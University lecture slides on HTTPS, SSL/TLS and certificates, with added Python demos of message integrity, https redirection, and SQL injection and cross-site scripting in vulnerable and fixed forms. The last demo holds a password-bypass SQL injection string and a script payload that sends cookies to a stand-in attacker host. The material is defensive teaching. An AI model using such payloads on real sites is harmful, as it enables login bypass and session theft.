COMP2322 Networks in Organisations Richard Henson University of Worcester April 2016.

Week 8: Network Services for Secure Web Pages n Objectives:  Explain how HTTPS/SSL/TLS fits into the OSI seven layer model  Take the necessary steps to implement SSL/TLS on a www server (install a server certificate and bind it to the https listener)  Apply PKI principles to produce a workable system for protecting web pages at the client end

Secure Sockets Layer (SSL) and Secure HTTP n Summary of SSL:  devised by Netscape (SSLv2 in 1995, SSLv3 in 1996)  very successful: it is the basis of HTTPS, i.e. ordinary HTTP carried inside an SSL/TLS channel  the browser only shows the page as “secure” when the whole exchange ran inside that channel  the early versions were later shown to be weak: SSLv2 and SSLv3 are now deprecated and should be disabled on servers  further developed by the IETF as TLS (TLS 1.0 in 1999, with later versions since) n But how does it all fit together?

Back to the TCP/IP model n Zoom in on TCP and the upper layers…  Level 7 (application): TELNET, FTP, SMTP, HTTP, HTTPS  Level 5 (session): session layer protocols, e.g. Unix “sockets”, SSL/TLS  Level 4 (transport): TCP

Secure HTTP (https) and the session layer n All application layer protocols communicate with the TCP layer through well-known TCP ports (HTTP on 80, HTTPS on 443) and an (optional) session layer logon n Security can therefore also be imposed by authenticating at this “logon” layer  e.g. using Kerberos authentication  a valid credential is required before data can pass the session layer and be displayed by the browser

Secure Sockets and the Session Layer n In the early days of Unix (4.2BSD, 1983) the concept of a “socket” was devised:  an interface between the application and transport layers that an application plugs into, identified by an IP address and a TCP port  the socket is a natural place to add authentication and encryption, which is what SSL later did n The concept continued, and was assimilated into the session layer of the OSI model n When Windows interfaced with TCP/IP for the first time, the term WINSOCK (Windows Sockets) was introduced for the equivalent API

The trouble with HTTP n General Internet principle of “anyone can go anywhere” n On a Windows system with www access:  the browser talks to HTTP through “Winsock”  no session layer authentication or encryption is invoked  HTML data is transferred in plain text straight up to the presentation and application layers for display n Problem:  the data is visible to anyone else on the Internet who has access to that machine or to any link on the data path to it (a shared Wi-Fi network, an ISP, a compromised router)

Secure HTTP and the user authentication problem n Makes use of the potential for requiring authentication at the session layer n The SSL/TLS handshake authenticates the server (and optionally the client) with certificates before any application data passes through the socket from transport layer to application layer n A username/password, where the site needs one, is then sent inside that encrypted channel rather than being what opens it (diagram: application / transport, with “authentication required” between them)

Computer Authentication n SSL is able to use the PKI (remember that?) n When a user first attempts to communicate with a web server over a secure connection:  that server will present the web browser with authentication data  presented as a server certificate (remember those?) »the browser checks that the certificate chains to a CA it trusts, is within its validity dates, and names the host that was asked for »this verifies that the server is who and what it claims to be n Works both ways…  protocol: the TLS handshake can also request a client certificate (mutual TLS); EAP-TLS is the variant used for network access control such as WPA-Enterprise Wi-Fi, not for web pages  more commonly the server authenticates the user afterwards, via a username/password sent over the now-encrypted channel

SSL and Encryption n Authenticating the user & server only helps when the data is at its source or destination  data also needs to be protected in transit… n SSL working at level 5/6 also ensures that it is: »encrypted before being sent »decrypted upon receipt and prior to processing for display

Confidentiality & Integrity n The data in an SSL session is encrypted with a symmetric cipher whose key is negotiated in the handshake (RSA is used for that key exchange, not for the data itself)  Older “standard” export-grade suites used 40 bit symmetric keys »breakable by brute force in hours on 1990s hardware, so only a nuisance to a determined attacker  “Secure” suites use 128 bit (or 256 bit) keys »brute force is infeasible: “virtually impossible to crack” n A message authentication code (MAC) over each record guarantees that the data has not been modified in transit by a third party  integrity is therefore also maintained; encryption on its own does not provide it
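The integrity point in the slide above, as an added example that is not part of the original lecture: a toy stream cipher built from HMAC-SHA256 in counter mode stands in for the negotiated cipher (the keys and nonce are constructed constants, not anything a real session would use). An attacker on the path changes an encrypted payment amount without knowing the key, and only the MAC check catches it.

```python
import hashlib
import hmac

# Constructed keys and nonce so the demo is deterministic; a real session
# negotiates fresh keys in the TLS handshake and never reuses a nonce.
ENC_KEY = bytes(range(32))
MAC_KEY = bytes(range(32, 64))
NONCE = b"\x00" * 16


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: HMAC-SHA256(key, nonce || counter) in counter mode."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR with the keystream is its own inverse."""
    return bytes(b ^ k for b, k in zip(data, keystream(key, nonce, len(data))))


def seal(enc_key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers the nonce and the ciphertext."""
    ct = xor_stream(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_record(enc_key: bytes, mac_key: bytes, record: bytes) -> bytes:
    """Verify the tag in constant time before decrypting; reject on mismatch."""
    nonce, ct, tag = record[:16], record[16:-32], record[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: record modified in transit")
    return xor_stream(enc_key, nonce, ct)


def flip_in_transit(ct: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Attacker's edit on a stream cipher: XOR old^new into the ciphertext.
    No key is needed, only knowledge of where the amount sits in the message."""
    ct = bytearray(ct)
    for i, (o, n) in enumerate(zip(old, new)):
        ct[offset + i] ^= o ^ n
    return bytes(ct)


def demo() -> dict:
    msg = b"PAY 0010 GBP TO ALICE"          # constructed message; amount at offset 4
    # 1. Encryption only: the receiver decrypts the attacker's amount happily.
    ct = xor_stream(ENC_KEY, NONCE, msg)
    tampered = flip_in_transit(ct, 4, b"0010", b"9999")
    without_mac = xor_stream(ENC_KEY, NONCE, tampered)
    # 2. Encrypt-then-MAC: the same edit is detected and the record rejected.
    record = seal(ENC_KEY, MAC_KEY, NONCE, msg)
    bad = record[:16] + flip_in_transit(record[16:-32], 4, b"0010", b"9999") + record[-32:]
    try:
        open_record(ENC_KEY, MAC_KEY, bad)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "without_mac": without_mac,
        "with_mac_rejected": rejected,
        "with_mac_ok": open_record(ENC_KEY, MAC_KEY, record),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The keystream construction is only there to keep the script self-contained; the lesson is in `flip_in_transit` versus `open_record`: confidentiality stops the attacker reading the amount, but only the authenticated tag stops them changing it.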

Is an SSL Digital Certificate Really Necessary? n Yes, one issued by a trusted CA:  for sites involved in e-commerce and therefore involving digital payment with authentication  any other business transaction in which the user must be sure which server they are talking to n No, a self-signed certificate can do:  if an administrator simply wants to ensure that data being transmitted and received by the server is private and cannot be snooped by anyone passively eavesdropping on the connection  caveat: a browser cannot tell a self-signed certificate from an attacker's, so unless the certificate (or its fingerprint) reaches the clients out of band and is pinned, an active man-in-the-middle can substitute their own; the channel is then encrypted but not authenticated  either way the server must have some certificate installed, since the https service will not start without one

The Web of Trust (PGP) n Based on individual trust networks built up between individuals n Possible to “self sign” a digital certificate  if someone trusts you, a self-signature may be all they need  OpenPGP identity certificates are designed to be self-signed, with other users adding their own signatures as they come to trust the key

Verisign Trust System n Web of Trust  OK for academics (“good” people?)  but “bad” people can also do business… n Verisign system developed by Internet/Business experts  Intention: people could trust strangers in web-based business transactions  a commercial Certification Authority (CA) provides the “trust”: it checks the applicant's identity, signs the certificate, and browsers ship with the CA's root certificate pre-installed

General Tips on Running SSL n Secure websites…  designed to be as efficient as securely possible »problem: encryption/decryption is computationally expensive from a performance standpoint (mainly the public-key operations in the handshake; bulk encryption is cheap on modern CPUs)  historically it was not thought necessary to run an entire Web application over SSL »customary for a developer to decide which pages require a secure connection and which do not »and create secure and non-secure folder structures for the respective web pages  caveat: mixing https and http pages on one site sends the session cookie in the clear on the plain pages and lets an attacker rewrite those pages so the secure links are never followed; current practice is to serve the whole site over https and redirect everything else to it

Installing a Server Certificate on Windows Servers that will support https n (video: link not preserved in this transcript)

When to use SSL n Whenever web pages require a secure connection with the server e.g.:  login pages  personal information pages  shopping cart checkouts  any pages where credit card information could possibly be transmitted  in practice every page that sets or reads a session cookie, which on most sites means all of them

Running HTTPS n A client-server service that runs on the Web server (like http, smtp, and ftp)  listens on TCP port 443 rather than 80  uniquely designed so it will not run on a server without an installed and active server certificate n Once the service has been set up, https will require users to establish an encrypted channel with the server  i.e. a URL beginning https:// rather than http:// n A user who requests a page from the https listener without TLS gets an error, rather than the pop up that precedes the secure web page

Running HTTPS n Use of encryption can interfere with access to data… (i.e. availability)  an encrypted channel running https requires that the user's Web browser and the Web server BOTH support at least one common cipher suite (protocol version, key exchange, cipher and MAC) n For example:  IF an IIS Web Server is set to use default secure communication settings  THEN the client Web browser must support a session key strength of 40 bits, or greater  current practice is to disable SSLv2/SSLv3 and the 40/56 bit export suites on the server: a browser still limited to them is refused rather than the connection being downgraded

Accessing a Web Page using HTTPS n If the client is to request a page that needs SSL:  in the HTML code that will call that page, prefix the address with https:// instead of http:// »the browser and server do the rest… n Any pages which absolutely require a secure connection need to:  check the protocol type (scheme) associated with the page request on the server side, not only in the link  redirect to the https: version (and send an HSTS header) if https: is not specified
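A server-side check of the kind the last three slides describe (secure folders, pages that need https, acting when https: is not specified), as an added example rather than the lecture's code: a minimal WSGI application that redirects plain-http requests for the secure paths, sends an HSTS header and marks the session cookie Secure. The paths, host names and cookie value are assumptions made for the demo.

```python
from wsgiref.simple_server import make_server  # only used for the stand-alone run

# Assumed "secure folder" layout for the demo: these paths must be https.
SECURE_PREFIXES = ("/login", "/account", "/checkout")
HSTS = "max-age=31536000; includeSubDomains"


def request_scheme(environ: dict) -> str:
    """Scheme as the server itself saw it. wsgi.url_scheme is set by the
    server from the socket, so a client cannot forge it. A header such as
    X-Forwarded-Proto is only trustworthy behind a reverse proxy you control,
    so it is deliberately not consulted here."""
    return environ.get("wsgi.url_scheme", "http")


def needs_tls(path: str) -> bool:
    return path.startswith(SECURE_PREFIXES)


def app(environ, start_response):
    path = environ.get("PATH_INFO", "/")
    host = environ.get("HTTP_HOST", "localhost")
    scheme = request_scheme(environ)

    if needs_tls(path) and scheme != "https":
        # Never serve the page over http: bounce the client to the https version.
        location = f"https://{host}{path}"
        if environ.get("QUERY_STRING"):
            location += "?" + environ["QUERY_STRING"]
        start_response("301 Moved Permanently",
                       [("Location", location), ("Content-Type", "text/plain")])
        return [b"redirecting to https"]

    headers = [("Content-Type", "text/html")]
    if scheme == "https":
        # HSTS tells the browser to use https for this host from now on, and
        # the Secure flag stops the cookie ever leaving over plain http.
        headers.append(("Strict-Transport-Security", HSTS))
        headers.append(("Set-Cookie", "session=abc123; Secure; HttpOnly; SameSite=Lax"))  # constructed value
    start_response("200 OK", headers)
    return [b"<html><body>page</body></html>"]


def handle(environ: dict):
    """Run one constructed request through app(); return (status, headers, body)."""
    captured = {}

    def start_response(status, headers):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    # Plain-http listener for local testing; in production the https listener
    # (IIS, Apache, nginx or a TLS-terminating proxy) sits in front of this.
    make_server("127.0.0.1", 8080, app).serve_forever()
```

Note that the redirect carries the original path and query string but nothing from the request body: a POST made over http has already leaked its form data, which is why the login form itself, not only its target, must be served over https.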

Has a Web Page been delivered securely using SSL? n 1. (depending on browser settings)  pop up appears…  informs the client that they are entering a secure client-server connection  must be acknowledged to continue n 2. Web page displayed:  https:// will appear before the URL  “lock” symbol appears (bottom left of the window in older browsers, in the address bar in current ones)  clicking the lock shows the certificate: check that the issuer is a CA you recognise and that the name on it is the site you meant to visit

How secure are your mobile apps? n Possible vulnerabilities (exploit poor programming):  MITM attack (interception and alteration of traffic en route) »much easier on wireless networks »an app that does not verify the server certificate is open to it even over https  SQL injection »user input concatenated straight into a database query »needs parameterised queries as well as input validation controls  DoS & DDoS »flooding the server with traffic or expensive requests (ping floods being the classic example)

More Vulnerabilities… n Cross-site Scripting (XSS)  attacker gets their own script into a page served by the genuine site, via a form field, query string or stored comment that is echoed back without encoding »the script runs in the victim's browser with the site's own privileges, and can read the session cookie or form data and send it to the attacker  not to be confused with phishing/pharming, where traffic is diverted to a look-alike clone of the site and users type their personal data into the clone n Buffer overflow  poor programming technique (copying input without checking its size) lets an attacker write past the end of a buffer, corrupting adjacent memory and in the worst case hijacking execution; sensitive data in nearby memory can also be overwritten or read out
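Two of the faults above (SQL injection and cross-site scripting), each in a vulnerable and a hardened form, as an added example not taken from the lecture. It runs against an in-memory SQLite table with constructed users, and the attacker's payloads are constructed too.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory user table with constructed rows (never store passwords like this)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "correct horse"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, name: str, password: str):
    """CWE-89: input concatenated into the query, so a quote in the input
    changes the query's structure."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(db, name: str, password: str):
    """Hardened: values are bound by the driver and can only ever be data."""
    row = db.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None


def greet_vulnerable(name: str) -> str:
    """CWE-79: reflects the input into HTML unencoded."""
    return f"<p>Hello, {name}</p>"


def greet_encoded(name: str) -> str:
    """Hardened: HTML-encode on output so the browser treats the input as text."""
    return f"<p>Hello, {html.escape(name, quote=True)}</p>"


def demo() -> dict:
    db = make_db()
    sqli_payload = "' OR '1'='1"                      # constructed: turns the WHERE clause true
    xss_payload = ("<script>document.location='http://attacker.example/?c='"
                   "+document.cookie</script>")      # constructed; host is fictional
    return {
        "sqli_bypass": login_vulnerable(db, "alice", sqli_payload),      # logged in, no password
        "sqli_blocked": login_parameterised(db, "alice", sqli_payload),  # None
        "sqli_real_login": login_parameterised(db, "alice", "correct horse"),
        "xss_raw": greet_vulnerable(xss_payload),
        "xss_encoded": greet_encoded(xss_payload),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

Input validation (length, character class) is still worth doing, but note that neither fix depends on it: parameterisation and output encoding remove the interpretation of input as code, which is what both faults are.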

CWE Top 25 faults (1) (the 2010 CWE/SANS Top 25 list)
Rank  ID        Name
 1    CWE-79    Failure to Preserve Web Page Structure ('Cross-site Scripting')
 2    CWE-89    Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
 3    CWE-120   Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
 4    CWE-352   Cross-Site Request Forgery (CSRF)
 5    CWE-285   Improper Access Control (Authorization)
 6    CWE-807   Reliance on Untrusted Inputs in a Security Decision
 7    CWE-22    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
 8    CWE-434   Unrestricted Upload of File with Dangerous Type
 9    CWE-78    Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
10    CWE-311   Missing Encryption of Sensitive Data
11    CWE-798   Use of Hard-coded Credentials
12    CWE-805   Buffer Access with Incorrect Length Value
13    CWE-98    Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
[TSI/2012/183] © Copyright

CWE Top 25 faults (2)
Rank  ID        Name
14    CWE-129   Improper Validation of Array Index
15    CWE-754   Improper Check for Unusual or Exceptional Conditions
16    CWE-209   Information Exposure Through an Error Message
17    CWE-190   Integer Overflow or Wraparound
18    CWE-131   Incorrect Calculation of Buffer Size
19    CWE-306   Missing Authentication for Critical Function
20    CWE-494   Download of Code Without Integrity Check
21    CWE-732   Incorrect Permission Assignment for Critical Resource
22    CWE-770   Allocation of Resources Without Limits or Throttling
23    CWE-601   URL Redirection to Untrusted Site ('Open Redirect')
24    CWE-327   Use of a Broken or Risky Cryptographic Algorithm
25    CWE-362   Race Condition

Hot off the Press… n This is reality, 5/4/2016 (i.e. today!):  442/websites-vulnerable-to-tls-certificate-man-in-the-middle-attacks

Thanks for Listening